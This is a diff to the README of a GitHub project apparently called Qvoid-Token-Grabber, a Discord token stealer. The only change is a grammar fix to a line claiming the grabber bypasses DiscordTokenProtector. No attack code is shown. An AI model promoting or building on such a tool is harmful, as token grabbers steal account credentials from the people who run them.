Enum0x539/Qvoid-Token-Grabber/README.md

  if you liked it consider to ⭐ this project and 🕵️ (follow) me 🤔.

 ### ⛔ What can I do against token grabbers?
 To be protected against token grabbers, you are more than welcome to install my Anti-Token-Grabber which is located on my GitHub.
-[I will upload it later meanwhile try https://github.com/andro2157/DiscordTokenProtector although this grabber bypassing it, other grabbers not]
+[I will upload it later meanwhile try https://github.com/andro2157/DiscordTokenProtector although this grabber bypassing it, other grabbers are not]

 ### 🤓 This project is under Berkeley Software Distribution (BSD) license.
 * The source code doesn’t need to be public when a distribution of the software is made.